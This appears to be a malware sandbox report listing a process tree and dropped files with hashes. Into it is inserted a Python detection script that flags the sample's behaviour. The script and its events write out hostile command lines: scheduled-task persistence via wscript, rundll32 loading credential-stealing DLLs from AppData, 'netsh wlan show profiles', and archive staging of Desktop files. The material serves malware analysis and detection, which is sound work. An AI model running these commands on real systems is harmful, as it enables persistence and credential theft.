                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                                                        1⤵
                                                                                                                                                                          PID:4304
                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                                                                                                                          1⤵
                                                                                                                                                                            PID:4444
                                                                                                                                                                          • C:\Windows\explorer.exe
                                                                                                                                                                            explorer.exe
                                                                                                                                                                            1⤵
                                                                                                                                                                              PID:1712
                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                                                              1⤵
                                                                                                                                                                                PID:4256
                                                                                                                                                                              • C:\Windows\explorer.exe
                                                                                                                                                                                explorer.exe
                                                                                                                                                                                1⤵
                                                                                                                                                                                  PID:4652
                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                                                                  1⤵
                                                                                                                                                                                    PID:4080
                                                                                                                                                                                  • C:\Windows\explorer.exe
                                                                                                                                                                                    explorer.exe
                                                                                                                                                                                    1⤵
                                                                                                                                                                                      PID:5580
                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                                                                      1⤵
                                                                                                                                                                                        PID:3944
                                                                                                                                                                                      • C:\Windows\system32\wscript.EXE
                                                                                                                                                                                        C:\Windows\system32\wscript.EXE "C:\Users\Admin\AppData\Local\ByteCraft Systems\CodeForge.js"
                                                                                                                                                                                        1⤵
                                                                                                                                                                                          PID:4240
                                                                                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                                                                                          explorer.exe
                                                                                                                                                                                          1⤵
                                                                                                                                                                                            PID:5448
                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                                                                            1⤵
                                                                                                                                                                                              PID:6000
                                                                                                                                                                                            • C:\Windows\explorer.exe
                                                                                                                                                                                              explorer.exe
                                                                                                                                                                                              1⤵
                                                                                                                                                                                                PID:4844
                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                  PID:4468
                                                                                                                                                                                                • C:\Windows\explorer.exe
                                                                                                                                                                                                  explorer.exe
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                    PID:2320
                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                      PID:3460
                                                                                                                                                                                                    • C:\Windows\explorer.exe
                                                                                                                                                                                                      explorer.exe
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                        PID:1392
                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                          PID:4164
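The process tree above shows, in order, a scheduled task registered through schtasks.exe that runs wscript on a .js file under AppData every 3 minutes, MsBuild.exe launched by an executable in Temp, rundll32 loading cred64.dll and clip64.dll from AppData\Roaming with the export Main, netsh wlan show profiles, PowerShell Compress-Archive staging a *_Desktop.zip in Temp, and the scheduled task later firing as wscript.EXE. The Python below is an added example and not part of the sandbox report: it runs a small rule set over process-creation records constructed from that tree (the ProcEvent record and its field names are a hypothetical stand-in loosely modelled on Sysmon Event ID 1; parent images are inferred from the tree's nesting and are an assumption, with "" where the tree shows no parent) and correlates the task's script path with the later wscript launch.

```python
import re
from dataclasses import dataclass

# Locations a standard user can write to; a DLL, script or archive here is far
# more suspicious than one under C:\Windows or C:\Program Files.
USER_WRITABLE = re.compile(r"\\(AppData|Temp|ProgramData|Users\\Public)\\", re.IGNORECASE)
# Script hosts and LOLBins a malicious task action typically points at.
SCRIPT_HOSTS = re.compile(r"\b(wscript|cscript|powershell|mshta|rundll32|regsvr32)\b", re.IGNORECASE)


@dataclass(frozen=True)
class ProcEvent:          # hypothetical record; fields loosely follow Sysmon Event ID 1
    pid: int
    image: str
    parent_image: str     # "" where the tree above does not show the parent
    cmdline: str


# Constructed from the process tree above; parent images inferred from its nesting.
EVENTS = [
    ProcEvent(2420, r"C:\Windows\system32\schtasks.exe", r"C:\Windows\system32\cmd.exe",
              r"""schtasks.exe /create /tn "Tex" /tr "wscript 'C:\Users\Admin\AppData\Local\ByteCraft Systems\CodeForge.js'" /sc minute /mo 3 /F"""),
    ProcEvent(1752, r"C:\Users\Admin\AppData\Local\Temp\4E32.exe", "", r"C:\Users\Admin\AppData\Local\Temp\4E32.exe"),
    ProcEvent(3268, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe", r"C:\Users\Admin\AppData\Local\Temp\4E32.exe",
              r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe"),
    ProcEvent(5480, r"C:\Windows\explorer.exe", "", "explorer.exe"),
    ProcEvent(6032, r"C:\Windows\SysWOW64\rundll32.exe", r"C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe",
              r'"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll, Main'),
    ProcEvent(1268, r"C:\Windows\system32\rundll32.exe", r"C:\Windows\SysWOW64\rundll32.exe",
              r'"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll, Main'),
    ProcEvent(5136, r"C:\Windows\system32\netsh.exe", r"C:\Windows\system32\rundll32.exe", "netsh wlan show profiles"),
    ProcEvent(4248, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"C:\Windows\system32\rundll32.exe",
              r"powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\808065738166_Desktop.zip' -CompressionLevel Optimal"),
    ProcEvent(2764, r"C:\Windows\SysWOW64\rundll32.exe", r"C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe",
              r'"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main'),
    ProcEvent(4240, r"C:\Windows\system32\wscript.EXE", "",
              r'C:\Windows\system32\wscript.EXE "C:\Users\Admin\AppData\Local\ByteCraft Systems\CodeForge.js"'),
]


def image_name(path):
    """Basename of an image path, lower-cased (wscript.EXE -> wscript.exe)."""
    return path.rsplit("\\", 1)[-1].lower()


def analyze(events):
    """Return (pid, rule) findings in event order; rule names are this example's own."""
    findings = []
    task_scripts = set()  # script paths registered through schtasks /create, for correlation
    for ev in events:
        name, cl = image_name(ev.image), ev.cmdline
        if name == "schtasks.exe" and "/create" in cl.lower():
            m = re.search(r'/tr\s+"(.*?)"\s+/sc', cl, re.IGNORECASE)
            action = m.group(1) if m else ""
            if SCRIPT_HOSTS.search(action) and USER_WRITABLE.search(action):
                findings.append((ev.pid, "schtasks_scripthost_persistence"))
                p = re.search(r"'([^']+)'", action)
                if p:
                    task_scripts.add(p.group(1).lower())
        elif name == "rundll32.exe":
            m = re.search(r'rundll32\.exe"?\s+(.+?\.dll)', cl, re.IGNORECASE)
            if m and USER_WRITABLE.search(m.group(1)):
                findings.append((ev.pid, "rundll32_userwritable_dll"))
        elif name == "netsh.exe" and re.search(r"wlan\s+show\s+profiles", cl, re.IGNORECASE):
            findings.append((ev.pid, "netsh_wlan_profiles"))
        elif name == "powershell.exe" and "compress-archive" in cl.lower():
            m = re.search(r"-DestinationPath\s+'([^']+)'", cl, re.IGNORECASE)
            if m and USER_WRITABLE.search(m.group(1)):
                findings.append((ev.pid, "powershell_archive_staging"))
        elif name == "msbuild.exe" and USER_WRITABLE.search(ev.parent_image):
            findings.append((ev.pid, "msbuild_from_userwritable_parent"))
        elif name in ("wscript.exe", "cscript.exe"):
            m = re.search(r'"([^"]+)"', cl)
            script = (m.group(1) if m else cl.split()[-1]).lower()
            if script in task_scripts:
                findings.append((ev.pid, "scheduled_task_fired"))   # task created earlier now runs
            elif USER_WRITABLE.search(script):
                findings.append((ev.pid, "wscript_userwritable_script"))
    return findings


if __name__ == "__main__":
    for pid, rule in analyze(EVENTS):
        print(f"PID {pid}: {rule}")
```

Two points worth carrying into real telemetry: the rules key on user-writable paths rather than on file names, so renaming cred64.dll or CodeForge.js does not evade them, and correlation should use a process GUID or timestamp rather than a bare PID, since the tree itself shows PID 2420 reused by schtasks.exe and later by explorgu.exe.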

Network

MITRE ATT&CK Enterprise v15

Downloads

• C:\ProgramData\Are.docx
  Filesize: 11KB
  MD5: a33e5b189842c5867f46566bdbf7a095
  SHA1: e1c06359f6a76da90d19e8fd95e79c832edb3196
  SHA256: 5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454
  SHA512: f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b

• C:\ProgramData\DHJDAFIE
  Filesize: 92KB
  MD5: 4c2e2189b87f507edc2e72d7d55583a0
  SHA1: 1f06e340f76d41ea0d1e8560acd380a901b2a5bd
  SHA256: 99a5f8dea08b5cf512ed888b3e533cc77c08dc644078793dc870abd8828c1bca
  SHA512: 8b6b49e55afe8a697aaf71d975fab9e906143339827f75a57876a540d0d7b9e3cbbcdd8b5435d6198900a73895cc52d2082e66ee8cec342e72f2e427dde71600

• C:\ProgramData\DirectSoundDriver 2.36.198.67\DirectSoundDriver 2.36.198.67.exe
  Filesize: 1.5MB
  MD5: aa590645e033ea8f8470a1b45ee309d5
  SHA1: b1fdc29f7f90edb21ae265f2a2f1b269d08c3423
  SHA256: 378bbecf4372e7162b2c97e6331fb67a5c030e2d2976c5343a168f1d73cab216
  SHA512: 25582d41b161917cdad4ba545602378351005e7df1d9f9857eaef6133c52695702dfbbd611818dc3877532b2a4607f69aa90e6aa8b08f13db9f3df49b0843b93

                                                                                                                                                                                                        • C:\ProgramData\FCAEBFIJ

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          220KB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          302e7bb88e0ca2e0a4b0fcb784f8e921

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          79304b5359b5a5ffa222a48373d214ff7bdca8e9

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          0583a074f22df06e2e66267c0cd1789e77849b6e7efaf9409baf814e95374f7b

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          b15a5c71ba415d794690d49ba1585866a88e3d437c95c5e78f057a22108c6018441df3ee4a66b05133999fb42a043423317792f785ac2d42c8a73bee33c805b6

                                                                                                                                                                                                        • C:\ProgramData\Google\Chrome\updater.exe

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          2.6MB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          3d233051324a244029b80824692b2ad4

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          a053ebdacbd5db447c35df6c4c1686920593ef96

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          fbd467ce72bca00eea3aaa6f32abc8aca1a734030d082458e21e1fe91e6a8d84

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          7f19c6400ac46556a9441844242b1acb0b2f11a47f5d51f6d092406a8c759a6d78c578bb5b15035e7cd1cdb3035acf0db884708b0da1a83eb652a50a68e3a949

                                                                                                                                                                                                        • C:\ProgramData\OutStep.txt

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          693KB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          74969bd8528b1b57ffca52e0bc7b3b54

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          ecc0a25b31ba6c60c1125693a027bc9cb401c707

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          03552373b313b775ae58f0c3cc4bdc9e4fa640ad0763c58188b761d1395a8bc2

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          608a98eb531e417b99f5cfc6069ca5220b6ffe2624ca7b3c2e2c379a2595716b55f08906f3a6289ff4a485bfcd72def5cf4ae8ca58aa84e2b483fa48c1b38006

                                                                                                                                                                                                        • C:\ProgramData\mozglue.dll

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          593KB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          c8fd9be83bc728cc04beffafc2907fe9

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          95ab9f701e0024cedfbd312bcfe4e726744c4f2e

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

                                                                                                                                                                                                        • C:\ProgramData\nss3.dll

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          2.0MB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          1cc453cdf74f31e4d913ff9c10acdde2

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          6e85eae544d6e965f15fa5c39700fa7202f3aafe

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\BABY-Clock\babyclock.exe

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.2MB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          0b4b6144c0d7281a4d2e34e44199d0c5

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          09c4e8d1a63e301444d01223ffc6d2b1a86173b3

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          47dc2d1974e63e35b98b757796e6ff73eacafd5ccf9cb77ec09ed6911c45ad4b

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          7c8ba0af622290dde8cec2a958764b17864bcdc92fcee8820dbaac9cf271d6bb46dc0a350c67f09f9fe37ad45362c72f6d339e6683f5f7abf361c4a6be90db81

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\BABY-Clock\babyclock.exe

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.1MB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          ddf5fe475916a430fb18941d19c89211

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          d31eebd92782de2e18be0c0a2d022a78ca4e74be

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          6e69754e03ca086758cd9c99afc004ca90d50b47e695addadaee64020311c8e9

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          5f853ffb1ca02b5224223d85c83acb4f1ff05065e2854b601cd8c72ba5912786d4980a48e0c82676b51a75a922b6441a34c11209c70b9d95c347d28982ba0386

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\BABY-Clock\babyclock.exe

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          984KB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          81de79f779f7485a323903718d959374

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          3baee3a8ea2d1451064c00ef2fdad79404a2565d

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          deca6bfd0957e2ee8d1dbb08e545a20d63e0cdb691873aa42ebbaa70c0c0f61b

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          dc5dbb1ca1e643d7880a7257293bf834f1e0c00cad08d6d2aa66fbd68826d5a92f8ac3326f128f0be194141b12932740368dd9c415f1384ca7745310ed4a6703

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\BABY-Clock\is-MLNLP.tmp

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          122KB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          6231b452e676ade27ca0ceb3a3cf874a

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          f8236dbf9fa3b2835bbb5a8d08dab3a155f310d1

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          9941eee1cafffad854ab2dfd49bf6e57b181efeb4e2d731ba7a28f5ab27e91cf

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          f5882a3cded0a4e498519de5679ea12a0ea275c220e318af1762855a94bdac8dc5413d1c5d1a55a7cc31cfebcf4647dcf1f653195536ce1826a3002cf01aa12c

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1KB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          47b22c695811b64b1c8ff3933f9ea6da

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          546e84c0f5b0062701a52f7fa7c22db48cc73cfd

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          a560208d6f4bc9b797926c8621f3657071918c88389c31e5a8a8851bb77bac07

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          a5342e8b3be45e1487f3356827796852c51c783d262ecebed6636402f38c40786027d10f9979135dda528ccb6e6d4931f92177a1c9e0d91da37919034268ac40

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          2B

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          d751713988987e9331980363e24189ce

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          97d170e1550eee4afc0af065b78cda302a97674c

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          40B

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          20d4b8fa017a12a108c87f540836e250

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          1ac617fac131262b6d3ce1f52f5907e31d5f6f00

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          6028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403101628281\additional_file0.tmp

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          2.5MB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          20d293b9bf23403179ca48086ba88867

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          dedf311108f607a387d486d812514a2defbd1b9e

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          fd996b95ae46014edfd630bfc2bf8bc9e626adf883a1da017a8c3973b68ec348

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          5d575c6f0d914583f9bb54f7b884caf9182f26f850da9bdd962f4ed5ed7258316a46fafaf3828dccb6916baaadb681fe1d175a3f4ed59f56066dc7e32b66f7b6

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403101628281\assistant\assistant_installer.exe

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          622KB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          10ab819cc1fd05db944a461213acf560

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          c2e41cb4d74e28351437f7a879bea3355c210ebf

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          ea86bedcce197838b0817719f395b9fdc978d4b07be79703e2e0aae11212dd8e

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          67ec7a885445de734e96545fc1646b6a86727c1d62ebde530ff3e1f0fe7d0afa5b9ca27d1b293f26f802358052bf46ad2815084c763d8678bd05148ac2d46512

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403101628281\assistant\assistant_installer.exe

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          192KB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          7b1d5aaede95bc464a6bc0494c0ffe07

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          8f1147308a389eb9aded7aec9eba9cbce2e25839

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          193d24c87e4f2c8ef05ae9b3b9c4e10248b9add7a38f228b4c6ebcf161bcb40c

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          4ff9827818a7ac021383293dfb061ad0a6a5430ea38908c1a7243f06ae5c530a34fb5d2c69ff15ed23eadd62d27a5a6627a8549d9f1a09585d5ea8b53753d1d8

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403101628281\assistant\dbgcore.dll

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          51KB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          e06f8bf58534ef7c5124c4f78e7a07dd

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          c9d2e9f84318de88cd94e12d8a8635ff248b7190

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          0fc30d71b17cb17dab1088cb80aff056f64e59fa2c3f2b54d384bd8be34cba06

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          f822eb539e027dc508142cf6188b6bff1fa098bd2dd7811fb9ed90031f3d2ecf56cdcef753e2563d06889a01c0a172c929826e59a2891676361558939315bccd

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403101628281\assistant\dbgcore.dll

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          166KB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          8b6f64e5d3a608b434079e50a1277913

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          03f431fabf1c99a48b449099455c1575893d9f32

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          926d444ffca166e006920412677c4ed2ef159cf0efc0578cb45b824f428f5eb2

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          c9aeac62ece564ac64a894300fb9d41d13f22951ead73421854c23c506760d984dff0af92bef2d80f3a66e782f0075832e9c24a50ae6110d27a25c14e065b41c

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403101628281\assistant\dbghelp.dll

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          375KB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          d9898f7b271fb93f85edc56f6eb12df2

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          dbbfa79af1636cb95cf1fc60c5bd5cfef3d1ffd7

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          7928244d487f29c60473295382bd2978ef80ad72a578d6fa6201d28d79d63b68

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          fe5540f0805a24d40aefc4476ed0fe5daa48a3f0f02073eead782a8ba8d39f53407456746ce8b341c076fafc5d79457922d04caf202edcad059a421b08ece16b

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403101628281\assistant\dbghelp.dll

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.5MB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          bfeb92b427ed6d61a15de77c52d5b361

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          19e8a46b84041f30279a3470765d027279dde58e

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          d7f1d277b2493e73efeec2f396907bf6eb2d7da2b04d940801cc62486d2c0533

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          3274a96a7a78d7468c698aedf9829983afc6eed67a20a4ee9b3fb9a95e6e23af2be422c151d0b3a7c47eaec68719d27c516130d909dda16abe73fdf5494a8479

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403101628281\assistant\dbghelp.dll

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.3MB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          6ee8b6a773f68a59355ce01c8466b2ff

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          88cd545c2b9cc8f497e9f838d1dcbd029a753689

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          0734fa38d671afe3b31989f8fc560320269a9aab00a60458aada68366758dff9

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          5f2b88e257afebc8a274038940a47af9af1b301d2ffaf2df8105ad5140af9379c08024931b6f4202da9cc2f4b16dbee25e37f21e11f40fea956f2c0dc93278b0

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403101628281\opera_package

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.8MB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          8e234ebc7ada13a83034ede749b0bad2

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          6e921c590fab1b79ad1074451a7e3933b50a5733

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          dc1edcb62279d45c8cf2bd99b56b6c9cd2042b11783057bd014c87819b9e21b9

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          1d89b764cec9a306e0ba06e65eb4917570a5bd85d265c1c4da5d319f4fb34c3346f20a695f1dcff9e6fd6cae6d57299fbb0f808b3686126728f38d58f9289741

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\tJ6HSphWPkDhrW4fuBx7FKRM.exe

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          448KB

                                                                                                                                                                                                          MD5

                                                                                                                                                                                                          db04f566eaffca5474d03ead0a08a16a

                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                          898508ca54f12193cc1e3085b2debfb4f23f7cde

                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                          14a1853237ca0895d78461ee94572b6d7e56e4f3f6e1d692b824ac904aea09a0

                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                          21caf496d3f0977f30ce1007da4fd0256a04afa68928fae15e93da976038895bd9c1e665e96e17aa14bc0e530aad1ef3a6b74a55a898c22b9fbdcffbdf8a700f

                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe

                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                          1.9MB

